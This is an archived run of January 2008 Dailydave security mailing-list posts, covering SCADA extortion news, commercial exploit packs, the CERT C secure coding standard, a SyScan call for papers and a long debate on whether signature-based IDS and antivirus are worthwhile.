http://www.immunityinc.com/downloads/0day_IPO.odp -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFHj4NPB8JNm+PA+iURAtx1AJ9MJnEvkGN7L3fyCiBq1YEqsVjXYwCg0wdx bXBkhY+ol0OWHYwtuUlaaHc= =o0bF -----END PGP SIGNATURE----- From dave at immunityinc.com Fri Jan 18 16:34:20 2008 From: dave at immunityinc.com (Dave Aitel) Date: Fri, 18 Jan 2008 16:34:20 -0500 Subject: [Dailydave] Mmm, all your power belongs to some random dude. Message-ID: <47911B5C.7010407@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 If you haven't seen the hackers owning your power yet, this article should be fun to read. Definitely interesting for next week's S4 conference on SCADA security: http://ap.google.com/article/ALeqM5jSw3W7MyNAF7rq8RTxcvoz76WIiwD8U8GUP02 """ WASHINGTON (AP) ? Hackers literally turned out the lights in multiple cities after breaking into electrical utilities and demanding extortion payments before disrupting the power, a senior CIA analyst told utility engineers at a trade conference. All the break-ins occurred outside the United States, said senior CIA analyst Tom Donahue. The U.S. government believes some of the hackers had inside knowledge to cause the outages. Donahue did not specify what countries were affected, when the outages occurred or how long the outages lasted. He said they happened in "several regions outside the United States." "In at least one case, the disruption caused a power outage affecting multiple cities," Donahue said in a statement. "We do not know who executed these attacks or why, but all involved intrusions through the Internet." """ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFHkRtbB8JNm+PA+iURAsTOAKDSTKtngvU8IqlETsNd9s131PZzDACfRqgG E3iwkXxsCrBIb+SOJggpBHw= =Xxy7 -----END PGP SIGNATURE----- From dave at immunityinc.com Fri Jan 18 16:42:08 2008 From: dave at immunityinc.com (Dave Aitel) Date: Fri, 18 Jan 2008 16:42:08 -0500 Subject: [Dailydave] Exploit pack verticals Message-ID: <47911D30.8050308@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Yesterday I was helping scope out a consulting assessment of some Citrix Presentation boxes. Today I noticed that ZDI released a remote Citrix vulnerability. This is the sort of thing where if you don't have the software already, it's going to be a pain to get it, set it up, configure it, and test it in time for your engagements. Essentially, the people best in place to write exploit packs that matter to a particular vertical ("Large enterprises" in this case) are embedded as partners with a large enterprise and have that perspective already. This is rarely true for most technical research organizations. I can see a time when there are exploit packs available that target "hospital software" (osdetect should find the MRI, right?), "School software" (Blackboard, etc), "Grocery Store" software (lots of SCO), etc. So if you haven't looked into the DSquare exploit pack, and you do any penetration testing at all, I highly recommend you do. Most of the exploits are in enterprise software, such as Citrix, HP Mercury Loadrunner, or IBM Tivoli, that you wouldn't be scanning for normally, but when you happen to run into it, you'll want an exploit ready to go. I personally enjoy having a 100% reliable Lotus Notes exploit at my fingertips when attacking random large organizations that run Lotus Notes, but maybe that's just me. :> More information is here: http://www.d2sec.com/products.htm - -dave -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFHkR0vB8JNm+PA+iURAhfQAKDCAKBjw5s1JlvOC5qDQs0bRr826gCfUU3M /QKrEVcFuB4YBEzzxvmwLq4= =mUka -----END PGP SIGNATURE----- From ronaldo at cais.rnp.br Sat Jan 19 03:40:48 2008 From: ronaldo at cais.rnp.br (Ronaldo Vasconcellos) Date: Sat, 19 Jan 2008 06:40:48 -0200 (BRST) Subject: [Dailydave] Mmm, all your power belongs to some random dude. In-Reply-To: <47911B5C.7010407@immunityinc.com> References: <47911B5C.7010407@immunityinc.com> Message-ID: Oh no, Die Hard 4.0 is real! Run for your lives, and call McClane and the nijaest hacker in the world, Farrell! Cheers, -- Ronaldo Castro de Vasconcellos, GIAC [GAWN,GCIH,SSP-DRAP] http://brainsniffer.blogspot.com/ http://blogs.securiteam.com/ On Fri, 18 Jan 2008, Dave Aitel wrote: > If you haven't seen the hackers owning your power yet, this article > should be fun to read. Definitely interesting for next week's S4 > conference on SCADA security: > http://ap.google.com/article/ALeqM5jSw3W7MyNAF7rq8RTxcvoz76WIiwD8U8GUP02 From dave.aitel at gmail.com Sat Jan 19 10:20:34 2008 From: dave.aitel at gmail.com (Dave Aitel) Date: Sat, 19 Jan 2008 10:20:34 -0500 Subject: [Dailydave] Passwords with different roles. Not so hard. Why don't we have this? Message-ID: http://techland.blogs.fortune.cnn.com/2008/01/18/the-hard-side-of-mister-softie/ Contact lists are important to users. Butwhy can't I have a password that just lets an online service access my contact lists, without giving them full control of my account? How come Mint and every other financial service get full control of your CC accounts when you want to use them? I saw Microsoft's ID Guru give a keynote at CSI this year, and while there was a lot of talk of cards and wallets, I didn't see an option pop up in hotmail for "password allow someone access to your contact list". Does openID solve this problem? Google IM just integrated with AIM, which is moving to Jabber anyways. Eventually we'll all have a user-ID from the AIM-GOOGLE alliance unless Microsoft or some other big player steps up and gives users flexibility to assign different passwords different roles on their own account. Also, why can't I attach an email to my CC number? Would make online purchases a lot more secure. -dave -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20080119/e240f5bc/attachment.htm From dave.aitel at gmail.com Sun Jan 20 16:45:37 2008 From: dave.aitel at gmail.com (Dave Aitel) Date: Sun, 20 Jan 2008 16:45:37 -0500 Subject: [Dailydave] Doing it for the LULZ? Message-ID: Scientology owned for the LULZ? http://www.digg.com/programming/Scientology_s_secret_documents_hacked_by_i_s_Splongcat Same guys appear to have a phpBB 0day: http://www.emo-corner.com/ And, of course, everyone's favorite, the RIAA (SQL Injection/XSS): http://parentingsquad.com/riaa-website-hacked-with-xkcd http://torrentfreak.com/riaa-website-hacked-080120/ -dave -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20080120/5de9df13/attachment.htm From rcs at cert.org Mon Jan 21 07:41:41 2008 From: rcs at cert.org (Robert C. Seacord) Date: Mon, 21 Jan 2008 07:41:41 -0500 Subject: [Dailydave] CERT C Secure Coding Standard In-Reply-To: References: Message-ID: <47949305.1010501@cert.org> The CERT/Coordination Center at the Software Engineering Institute at Carnegie Mellon University has lead a community effort to develop secure coding standards for the C and C++ programming languages. This work is being performed on the secure coding wiki at www.securecoding.cert.org. In particular, we have made significant progress on the CERT C Programming Language Secure Coding Standard since work first begun over a year and half ago and our progress as been reviewed by the ISO/IEC WG14 international standardization working group for the programming language C at both the London and Kona meetings. We would again like to invite the community to review and comment on the current version of the standard available at www.securecoding.cert.org before we publish version 1.0 of the standard. We prefer that you post your comments directly on the wiki, but can accept comments by email. To post comments directly on the wiki, simply create an account on www.securecoding.cert.org and post your comments below the appropriate rule or recommendation. There is some possibility that ISO/IEC WG14 may eventually publish this document as either a type II or a type III (informational) technical report. This document may also be mined for ideas for the next major revision of the C language standard. As a result, we would greatly appreciate your time and expertise in reviewing the standard, and we will acknowledge your contributions. Thanks, rCs -- Robert C. Seacord Senior Vulnerability Analyst CERT/CC Work: 412-268-7608 FAX: 412-268-6989 From dave at immunityinc.com Tue Jan 22 14:42:31 2008 From: dave at immunityinc.com (Dave Aitel) Date: Tue, 22 Jan 2008 14:42:31 -0500 Subject: [Dailydave] Going against the Gradient Message-ID: <47964727.5030708@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I posted a quick paper which I wrote for a private newsletter that went out in December. Quicky link is here: http://www.immunityinc.com/downloads/GoingAgainstTheGradient.pdf http://www.immunityinc.com/downloads/GoingAgainstTheGradient.odt - -dave -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFHlkclB8JNm+PA+iURAiAKAKCl3wnZFIoOBWKfWBD9SY22T+CP1gCeOONI MzeskI0nX3uXpgEsUvyZ3Qs= =bZ13 -----END PGP SIGNATURE----- From demottja at msu.edu Tue Jan 22 15:45:13 2008 From: demottja at msu.edu (Jared DeMott) Date: Tue, 22 Jan 2008 15:45:13 -0500 Subject: [Dailydave] Going against the Gradient In-Reply-To: <47964727.5030708@immunityinc.com> References: <47964727.5030708@immunityinc.com> Message-ID: <479655D9.4020101@msu.edu> Dave Aitel wrote: > I posted a quick paper which I wrote for a private newsletter that > went out in December. > Quicky link is here: > http://www.immunityinc.com/downloads/GoingAgainstTheGradient.pdf > http://www.immunityinc.com/downloads/GoingAgainstTheGradient.odt > > -dave > Dave my man. I agree that security is an arm's race for signature based products. Though should we throw out the baby with the dirty water? Is no firewall, VLANs, route filtering, IDS, AV, central management/logging, etc better than a lame one? And besides perhaps some witty vendor will come up with a new solution. :) Also remember that Information Assurance is not strictly a technical issue tied to vendor solutions. There's the other happy crap like security policies, fences, card swipes, PKI, anti-social engineering training, disaster planning/recovery, risk management, etc, etc.. Hey, and since you brought up Vista you've got to admit that they're making exploitation more challenging ... though the reverse affect of that is that all 0days are now underground and not getting published since they're worth way too much. So while Vista may be more secure in terms of number of 0days out there ... the severity of secret ones (which as you mention bypass AV/IDS/etc) has risen. And it's not like we can all just stop using browsers and email clients.... :) Security's not such a lost cause - it's just as challenging as ever! Blessings, Jared From jms at bughunter.ca Tue Jan 22 17:24:12 2008 From: jms at bughunter.ca (J.M. Seitz) Date: Tue, 22 Jan 2008 14:24:12 -0800 Subject: [Dailydave] Going against the Gradient In-Reply-To: <479655D9.4020101@msu.edu> References: <47964727.5030708@immunityinc.com> <479655D9.4020101@msu.edu> Message-ID: <47966D0C.9070505@bughunter.ca> > Dave my man. I agree that security is an arm's race for signature based > products. Though should we throw out the baby with the dirty water? Is > no firewall, VLANs, route filtering, IDS, AV, central > management/logging, etc better than a lame one? Yeah, in some cases it is better to not have something than to have a lame one. When I say lame I am factoring in the host of client-sides which are rarely (if ever) detected, the constant stream of AV 0-day, and other badness. Let's be honest, the nRuns guys were right: "defense in depth is dead and we killed it." > Hey, and since you brought up Vista you've got to admit that they're > making exploitation more challenging ... though the reverse affect of > that is that all 0days are now underground and not getting published > since they're worth way too much. So while Vista may be more secure in > terms of number of 0days out there ... the severity of secret ones > (which as you mention bypass AV/IDS/etc) has risen. And it's not like > we can all just stop using browsers and email clients.... :) Security's > not such a lost cause - it's just as challenging as ever! I agree, I don't think that security is a lost cause. I think that in order to really make a difference as info-sec professionals, we have to _really_ step into the shoes of a real attacker with a real business model. The only way we can continually advance our protection mechanisms is to increase the complexity and virulence of our simulated attacks. Whoever hires the best attackers will ultimately stay ahead in the arms race. JS From joanna at invisiblethings.org Tue Jan 22 17:42:20 2008 From: joanna at invisiblethings.org (Joanna Rutkowska) Date: Tue, 22 Jan 2008 23:42:20 +0100 Subject: [Dailydave] Going against the Gradient In-Reply-To: <479655D9.4020101@msu.edu> References: <47964727.5030708@immunityinc.com> <479655D9.4020101@msu.edu> Message-ID: <4796714C.3060901@invisiblethings.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Jared DeMott wrote: | Dave Aitel wrote: |> I posted a quick paper which I wrote for a private newsletter that |> went out in December. Quicky link is here: |> http://www.immunityinc.com/downloads/GoingAgainstTheGradient.pdf |> http://www.immunityinc.com/downloads/GoingAgainstTheGradient.odt |> |> -dave |> | Dave my man. I agree that security is an arm's race for signature | based products. I don't think Dave said it was an arm-race. To me it sounded like if it was a *waste of time*, which, BTW, I fully agree with. Arm-races result in advancing the technology, usually on both sides -- this can not be seen in the AV products nor malware used in the wild. Alex will probably not agree with me here, arguing the some new Russian malware creations have plenty of cool new features -- true, but those new features do not change the battlefield in any way -- they are more like having yet another 2 speakers in you car audio system, that already has had 9 of them ;) | Though should we throw out the baby with the dirty water? Is no | firewall, VLANs, route filtering, IDS, AV, central | management/logging, etc better than a lame one? Bingo! | Security's not such a lost cause - it's just as challenging as ever! | "Security is a constant challenge", "never ending process", etc, blablabla... There can be a Challenge and a challenge. One results in some progress, while the others only in a pseudo-progress. Introduction of a few new security(?) mechanisms in Vista, like e.g. UAC, Driver Signature Enforcement and Kernel Patch Protection is another example of a pseudo-bar-raising arm-race. Unlike some anti-exploitation mechanisms (e.g. ASLR, DEP), those do not make it even a bit harder for the bad guys to get their malware installed. Everybody knows how to cheat them and MS is not going anything about it (I know they keep updating Patch Guard, and we all know that it's not changing anything). joanna. ps. No, I don't think that the whole A/V industry should die -- they should just transition into a different role. (I keep promising myself to write an article about it...) -----BEGIN PGP SIGNATURE----- iQEcBAEBAgAGBQJHlnFJAAoJEMwG7MOLAMOlwO4H/i/DWOVEOYGcpLYsvI5iyelw VDjEKF5pMWJXuSfAz0Y/rSuu4kpXf97wCwFo8jGMJLI1lEBwmJATSzuZNNbfyb5F losPEw9hcJXN/iZ9LKHotTRJgngwwBgd4N6+D05/Oc2es+h1e6TuthDSgrDraucD 2q8JzH2EVNV817LYKObwJAqglfEc3g+82d2h7aCl8RNom7VsmJHX3+3eFcMwhWnZ yHDfPgoyWwsyO7MBFsHXDgvfBvfKW4/YH6KZju18jnZuxFUA/XfB/I7DT2XE4QSR XVibapR3s+ROAA1zJcIXNl2ohK3HdnfySBhPGnDl9SEUrhXdOAa0N0NyFmQsFk8= =byhG -----END PGP SIGNATURE----- From druid at caughq.org Tue Jan 22 20:28:14 2008 From: druid at caughq.org (I)ruid) Date: Tue, 22 Jan 2008 19:28:14 -0600 Subject: [Dailydave] Going against the Gradient In-Reply-To: <479655D9.4020101@msu.edu> References: <47964727.5030708@immunityinc.com> <479655D9.4020101@msu.edu> Message-ID: <1201051694.4428.17.camel@localhost> On Tue, 2008-01-22 at 15:45 -0500, Jared DeMott wrote: > Also remember that Information Assurance is not strictly a technical > issue tied to vendor solutions. There's the other happy crap like > security policies, fences, card swipes, PKI, anti-social engineering > training, disaster planning/recovery, risk management, etc, etc.. "anti-social engineering"? heh... "LEAVE ME ALONE I HATE YOUR FACE!!! ...but gimme your password first." -- I)ruid, C?ISSP druid at caughq.org http://druid.caughq.org -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: This is a digitally signed message part Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20080122/20179bcc/attachment.pgp From dave at immunityinc.com Wed Jan 23 21:13:54 2008 From: dave at immunityinc.com (Dave Aitel) Date: Thu, 24 Jan 2008 15:13:54 +1300 Subject: [Dailydave] Call For Papers: SyScan '08! Message-ID: <4797F462.8040804@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Posted on Behalf of the SyScan CFP Committee. - -dave CALL FOR PAPERS/TRAINING CFP COMMITTEE The Call for Papers committee for SyScan?08 comprises of the following personnel: 1. Thomas Lim ? Organiser of SyScan and CEO of COSEINC 2. Dave Aitel ? Founder and CTO of Immunitysec 3. Marc Maiffret ? Founder and Chief Hacking Officer of eEye 4. Matthew ?Shok? Conover ? Symantec The CFP committee will review all submissions and determine the final list of speakers for SyScan?08. CONFERENCE TOPICS The focus for SyScan?08 will include the following: Operating Systems ? Vista ? Linux Mobile Devices/Embedded systems ? SmartPhones ? PDAs ? Game Consoles Web 2.0 ? Web services ? PHP ? .Net ? Web applications Networking/Telecommunication ? VoIP ? 3G/3.5G network ? IPv6 ? WLAN/WiFi ? GPRS Malware BotNets Virtualization Additional topics for SyScan?08 Hong Kong: Security Policy/Best Practices Legislation Industry Specifics ? ? Finance ? Hotels Any topics that will catch the attention of the CFP committee and/or the world. TRAINING TOPICS SyScan?08 training topics will focus on the following areas: Web Applications ? .Net applications ? Java applications Networks ? VoIP ? 3G/3.5G network ? IPv6 ? WLAN/WiFi ? GPRS Securing Windows/Linux Systems Databases Storage PRIVILEGES Speakers? Privileges: ? Return economy class air-ticket for one person. ? 3 nights of accommodation. ? Breakfast, lunch and dinner during conference. ? After-conference party. ? A very healthy dose of alcohol and fun. ? S$500 cash for speakers with brand new presentations. Trainers? Privileges: ? 50% of net profit of class. ? 2 nights of accommodation (conference) (applicable for Singapore only). ? After-conference party. ? A very healthy dose of alcohol and fun. Please note that the net profit for each class is determined by the difference between the total fee collected for each class and the total expenses incurred for each class. The expenses of each class would include the return economy air-ticket of the trainer, 3 nights of accommodation (training) and the rental of the training venue. CFP SUBMISSION: CFP submission must include the following information: 1) Brief biography including list of publications and papers published previously or training classes conducted previously. 2) Proposed presentation/training title, category, synopsis and description. 3) Contact Information (full name, alias, handler, e-mail, postal address, phone, fax, photo, country of origin, special dietary requirement). 4) Employment and/or affiliations information. 5) Any significant presentation and educational/training experience/background. 6) Why is your material different or innovative or significant or an important tutorial? Please note that all speakers will be allocated 50 minutes of presentation time. Any speakers that require more time must inform the CFP committee during the CFP submission. Training classes will be 2 full days. Please inform the CFP committee if your class is shorter or longer than 2 days during your CFP submission. All submissions must be in English in either MS Office or PDF format. The more information you provide, the better the chance for selection. Please send submission to cfp at syscan.org. IMPORTANT DATES Hong Kong Final CFP Submission ? 29th February 2008 Notification of Acceptance ? 30th March 2008. Final Submission for Accepted Presentation Material (Speakers) ? 15th April 2008 Singapore Final CFP Submission ? 30th April 2008 Notification of Acceptance ? 30th May 2008. Final Submission for Accepted Presentation Material (Speakers) ? 15th June 2008 OTHER INFORMATION Please feel free to visit SyScan website to get a feel what this conference is all about ? SHARE AND HAVE FUN! By agreeing to speak at the SyScan'07 you are granting SyScan Pte. Ltd. the rights to reproduce, distribute, advertise and show your presentation including but not limited to http://www.syscan.org, printed and/or electronic advertisements, and all other mediums. - -- Thank you Thomas Lim COSEINC Private Limited -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHl/RhtehAhL0gheoRAuq8AJ0VoCSRLT/vHnVTgQXfc5Lg67Lt0gCggR5Q bFe5dD2h6cuV0dfgz27DDV4= =8Ud3 -----END PGP SIGNATURE----- From taosecurity at gmail.com Wed Jan 23 21:35:08 2008 From: taosecurity at gmail.com (Richard Bejtlich) Date: Wed, 23 Jan 2008 21:35:08 -0500 Subject: [Dailydave] Going against the Gradient Message-ID: <120ef0530801231835j5df5318dt1ced3596a23289d3@mail.gmail.com> Dave Aitel wrote: > I posted a quick paper which I wrote for a private newsletter that > went out in December. > Quicky link is here: > http://www.immunityinc.com/downloads/GoingAgainstTheGradient.pdf Hi Dave, In your paper you wrote: "If you're wondering about this, just turn around and ask your million dollars worth of IDS equipment and personnel when the last time they caught a hacker was." My answer: today. I am not joking. The question is knowing what to look for (processes), tools that capture and inspect the right data (products), and analysts who can analyze and escalate (people). Can I deploy all three in a cost-effective manner, such that they will be 100% effective at time of initial exploitation? Of course not. Can I use some combination to increase visibility and awareness, and drive incident detection and response? Of course! I may not know exactly what I need to immediately detect (much less prevent) an intrusion, but given the right process-products-people it is possible to at least do retrospective analysis, damage assessment, and then improve resistance to future attack. This is why I have advocated Network Security Monitoring for the last six years as a "beyond IDS" methodology. I've always acknowledged that some intruders are ahead of defenders, but that's not a static condition. This has been an old story for the last ten years, but some of us are still catching real bad guys for a living. You finish by writing: "Encryption, network protocol complexity, and continued attacker innovation have rendered your existing security arsenal useless. This year's question is: What are you going to do about it?" Seriously (not sarcastically), what is your answer? We do need help out here. Sincerely, Richard From rcs at cert.org Thu Jan 24 10:47:00 2008 From: rcs at cert.org (Robert C. Seacord) Date: Thu, 24 Jan 2008 10:47:00 -0500 Subject: [Dailydave] CERT C Secure Coding Standard In-Reply-To: <002901c85c48$cbd90fa0$2e08a8c0@CAM.ARTIMI.COM> References: <47949305.1010501@cert.org> <002901c85c48$cbd90fa0$2e08a8c0@CAM.ARTIMI.COM> Message-ID: <4798B2F4.1090306@cert.org> Dave, There is a PDF version in the pre-Kona mailing for WG14: http://www.open-std.org/jtc1/sc22/wg14/www/docs/pre-Kona-2007.htm The problem with this version (and any PDF I create) is that it rapidly becomes obsolete WRT to the wiki version which is constantly evolving. We are in the process right now of adding an additional navigation facility on the wiki which will make it easier to sequentially read the document. We should be able to complete this before you can finish reading it, assuming you are human. ;^) Thanks for your interest. I am looking forward to receiving your comments. rCs > On 21 January 2008 12:42, Robert C. Seacord wrote: > > >> We would again like to invite the community to review and comment on the >> current version of the standard available at www.securecoding.cert.org >> before we publish version 1.0 of the standard. >> > > Is it available in some flat format? I'd find it a lot easier to read as a > PDF or single HTML file than lots and lots of separate web pages. > > > cheers, > DaveK > From knoble at terremark.com Fri Jan 25 14:42:38 2008 From: knoble at terremark.com (Kevin Noble) Date: Fri, 25 Jan 2008 14:42:38 -0500 Subject: [Dailydave] Revisit to Information Warfare Message-ID: <5BA9127B88DFD347AE9A8F1C05A6E08B01748C3A@exchange04.terremark.org> Some interesting talk around international law and cyber crime is being picked up by all the media stemming from a opinion in the news. I find the authors original paper far more interesting: http://papers.ssrn.com/sol3/papers.cfm?abstract_id=1083889 Pages 8-16 have the typical blend of information warfare although the author calls it Information Operations (IO) as a subsection of Computer Information Operations then offers some legal digression into how to alleviate the problems around IO. Still makes for a good read. What might be interesting is how states may extend sovereignty it into cyberspace, namely psyops and electronic embargoes and other polices enforcement by military forces are on the horizon. How do states adjust to espionage if the spies never leave the host country? The questions posed are fairly vast and the paper covers the DDoS of Estonia that may merit a reply from Estonia CERT or Gadi E. The paper certainly demonstrates that International cyberlaw (not the trademark version) is not even in its infancy were the lotus principal is king (what international law does not prohibit, it permits.) Kevin Noble From demottja at msu.edu Mon Jan 28 09:32:48 2008 From: demottja at msu.edu (Jared DeMott) Date: Mon, 28 Jan 2008 09:32:48 -0500 Subject: [Dailydave] Going against the Gradient In-Reply-To: <085485A8ADCB4B49874A54D6185A21FD0176253C@exch2.verniernetworks.com> References: <47964727.5030708@immunityinc.com> <479655D9.4020101@msu.edu> <085485A8ADCB4B49874A54D6185A21FD0176253C@exch2.verniernetworks.com> Message-ID: <479DE790.50500@msu.edu> > Every time I hear the argument that some level of security, even lame > security, is better than NO security, I think about my Zappa > paraphrasing. In my opinion, lame security is WORSE than no security, > simply because most of the people involved (think CxO/pointy-haired boss > types) live with a sense that they are being protected, when in fact > they are not. The ones with no protection are not living a lie -- they > are at least AWARE they really have no security. I understand your frustration with current sales consultants continuously pushing the latest garbage down companies throats. Yet, every time I hear a statement like this ... it just sounds silly to me. The 0day to the desktop that circumvents all known security measures is a real threat. I think all decent security folks know this. However, what you're really talking about is the "gold nuggent scenario". My big corp/Agency has one secret block of info, and if it ever gets compromised we're totally hosed. That's a real scenario, for certain high profile targets, and that is why the air-gap is still in use. However, consider the medium sized school network, in which all they really want to do is keep stuff working. Yah, the don't want to lose student records, or have students change grades, etc, etc. But with proper filtering, AV, ghosting often in labs, VPNs, VLANS, etc, they're able to keep the networks clean and functioning well enough for students and faculty to do their daily jobs. So, in my opinion, while current security processes are far from perfect, a good and continuous effort is always better than no effort. Jared From dave at immunityinc.com Mon Jan 28 09:39:17 2008 From: dave at immunityinc.com (Dave Aitel) Date: Mon, 28 Jan 2008 09:39:17 -0500 Subject: [Dailydave] Semi-anonymized moderation. Message-ID: <479DE915.80200@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Post from Mark Loveless who is subscribed from a diff email and hit "reply all". My moderation gui drops anything from anyone not subscribed, so I'm "moderating" this manually. - -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 >> Dave my man. I agree that security is an arm's race for >> signature based products. Though should we throw out the baby >> with the dirty water? Is no firewall, VLANs, route filtering, >> IDS, AV, central management/logging, etc better than a lame one? >> And besides perhaps some witty vendor will come up with a new >> solution. :) I'll bite. I'd say as a person who has worked on multiple security products, it is a losing battle. The network is simply hostile. Forget the firewalls with holes in them to allow users to send/receive email, web traffic, IM, plus "trusted" vendors, suppliers, contractors, overseas divisions, and an increasing mobile workforce -- there are simple rules of physics to contend with here, and as a result the network on both sides of the firewall is hostile. If every exploit set the evil bit, we'd just look for that one thing. However any signature-based system has to look at all possible attacks. Now for even ASIC-based systems, you run out of memory real quick. This is the physics thing I mentioned earlier. Most IDS/IPS vendors have a ceiling limit on about 1800-2000 signatures that can be active at once. NO vendor ships with all 5k-10k signatures turned on. The machine would drop packets and grind to a halt. Therefore what signatures do you pick? Only the ones that affect your user base? What about home users coming in via VPN (doubly bad, you may not support the platform AND the communication is encrypted)? Do you think anti-virus companies have it any better? What about anomaly-based host systems? Arguably better, however there are two factors that prevent massive deployment: 1) You now have to run low-level code on all your systems. Aside from the technical issues that this may cause, your CxO types may have gotten burned when the last time code was loaded on every system, it didn't prevent some massive infection. Additionally, the Gartners of the world are quick to point out that the upper right quadrant is filled with signature-based companies anyway, so any consultants/sales people wanting to make a sale have to explain away that upper quadrant in that goofy chart. Hybrid systems that use sigs for the low-hanging fruit and anomaly detection for the hard stuff might creep into the upper right quad (hopefully you know what I mean by Gartner's upper right quad, google it if you don't know). 2) It is cheaper to deploy technology at the "choke points" instead of everywhere, and A/V is about all you can expect to get on the desktop nowadays. Besides the auditors of the world will tell your organization that due diligence is having that A/V there, on the Exchange server, and the fact you have a firewall pretty much has you covered from an audit standpoint. My solution would be to lock down the desktops and servers via hardening, run email and web browsers in sandboxes, and replace the firewalls with router ACLs that simply take large swipes at the traffic to help create a division from the outside world. Firewalls are simply glorified routers at this point anyway, as most are configured to allow certain types of traffic right in through the front door. I used to quote Frank Zappa's comments on modern jazz as "jazz isn't death, it just smells funny" in presentations, saying the same thing about perimeter security. Around 2002 or so I simply started saying perimeter security is just dead. I had a very serious discussion about this very topic with Bill Cheswick around the same time, with both of us threatening to write a paper or article on the topic. Every time I hear the argument that some level of security, even lame security, is better than NO security, I think about my Zappa paraphrasing. In my opinion, lame security is WORSE than no security, simply because most of the people involved (think CxO/pointy-haired boss types) live with a sense that they are being protected, when in fact they are not. The ones with no protection are not living a lie -- they are at least AWARE they really have no security. Mark - -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (MingW32) iD8DBQFHlnf7cWrXS8hLmpIRAlV3AJ4xm+t46kKtUaFZ3zbVB9VmEUIPqwCfcNgi yEHFuPRkLlrQEI90G/h3RQg= =DhdV - -----END PGP SIGNATURE----- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFHnekTB8JNm+PA+iURAgnLAJ9/MYp/eoneY4TwIr50XRIlAZBgCgCgj8ME 48wF+iNSfnb0rOEBiF/eSpk= =d2Lw -----END PGP SIGNATURE----- From arunkoshy at gmail.com Mon Jan 28 10:24:31 2008 From: arunkoshy at gmail.com (Arun Koshy) Date: Tue, 29 Jan 2008 02:24:31 +1100 Subject: [Dailydave] Going against the Gradient In-Reply-To: <479DE790.50500@msu.edu> References: <47964727.5030708@immunityinc.com> <479655D9.4020101@msu.edu> <085485A8ADCB4B49874A54D6185A21FD0176253C@exch2.verniernetworks.com> <479DE790.50500@msu.edu> Message-ID: <1d0ba3070801280724m57018ec8waf1eb2b918863cb1@mail.gmail.com> A friend of mine who's a research professor advises all of us to read : http://www.des.emory.edu/mfp/Kuhn.html note to Dave : try to remember the sci-fi novels' name .. ;-) From dave at immunityinc.com Mon Jan 28 11:05:26 2008 From: dave at immunityinc.com (Dave Aitel) Date: Mon, 28 Jan 2008 11:05:26 -0500 Subject: [Dailydave] The Attack Development Lifecycle Message-ID: <479DFD46.3010409@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Often when you write a talk or paper, you find out much later what it is about. In the case of the S4 SCADA Security conference talk I gave last week, I realized only the day before what it was really trying to say. Essentially, I think hackers in general have a method that defeats various company's Secure Development Lifecycles. ("Linux" is included here as a "company") Of course, like any system, a SDL can be attacked. And when it is successfully compromised, you see the pattern we see now: widespread ability to compromise systems. Malware everywhere. An untrustworthy Internet. I think hackers do this at a macro level via emergent behaviors that evolved over time. I also think that if you approach it systematically, you can build a process and set of technology to defeat any company's particular SDL over the long term. Building these processes and obtaining this technology is a large part of my job at Immunity. No doubt many of the people on this list have a similar job. In any case, that's what the presentation here is about. I'll name the next one the "Attack Development Lifecycle" to be more explicit. http://www.immunityinc.com/downloads/DaveAitel_TheHackerStrategy.pdf - -dave -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFHnf1EB8JNm+PA+iURArWdAKDJG65zOx1jrEaJ0rv8M7EeJy2MBwCggGE+ 1N4ohsJ3V7EaGIWCHQn6SkA= =Ojnt -----END PGP SIGNATURE----- From kowsik at gmail.com Mon Jan 28 11:25:47 2008 From: kowsik at gmail.com (Kowsik) Date: Mon, 28 Jan 2008 08:25:47 -0800 Subject: [Dailydave] Semi-anonymized moderation. In-Reply-To: <479DE915.80200@immunityinc.com> References: <479DE915.80200@immunityinc.com> Message-ID: <7db9abd30801280825x6c84d60cg6b95d988a85df728@mail.gmail.com> After 5+ years of stopping this, stopping that, writing anti-malware, anti-dos, anti-backdoors, anti-vulnerablities, anti-scanners, anti-spoofing, anti-this and anti-that, it pretty much came down to "ENOUGH ALREADY!", for me. Being reactive just ain't fun. It gets pretty damn tiring after a while when for ever rule the ID/PS has, there are like a million exceptions on the network. No, I'm not just talking about evasions and obfuscations. One small step for the attacker, one impossible jump for the rest - especially with the current approach. This is not a dig on specific products or how they work. They do what they are intended to do reasonably well. However, the problem they all set out to solve is inherently intractable. K. On Jan 28, 2008 6:39 AM, Dave Aitel wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > > Post from Mark Loveless who is subscribed from a diff email and hit > "reply all". My moderation gui drops anything from anyone not > subscribed, so I'm "moderating" this manually. > > - -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > >> Dave my man. I agree that security is an arm's race for > >> signature based products. Though should we throw out the baby > >> with the dirty water? Is no firewall, VLANs, route filtering, > >> IDS, AV, central management/logging, etc better than a lame one? > >> And besides perhaps some witty vendor will come up with a new > >> solution. :) > > I'll bite. I'd say as a person who has worked on multiple security > products, it is a losing battle. The network is simply hostile. Forget > the firewalls with holes in them to allow users to send/receive email, > 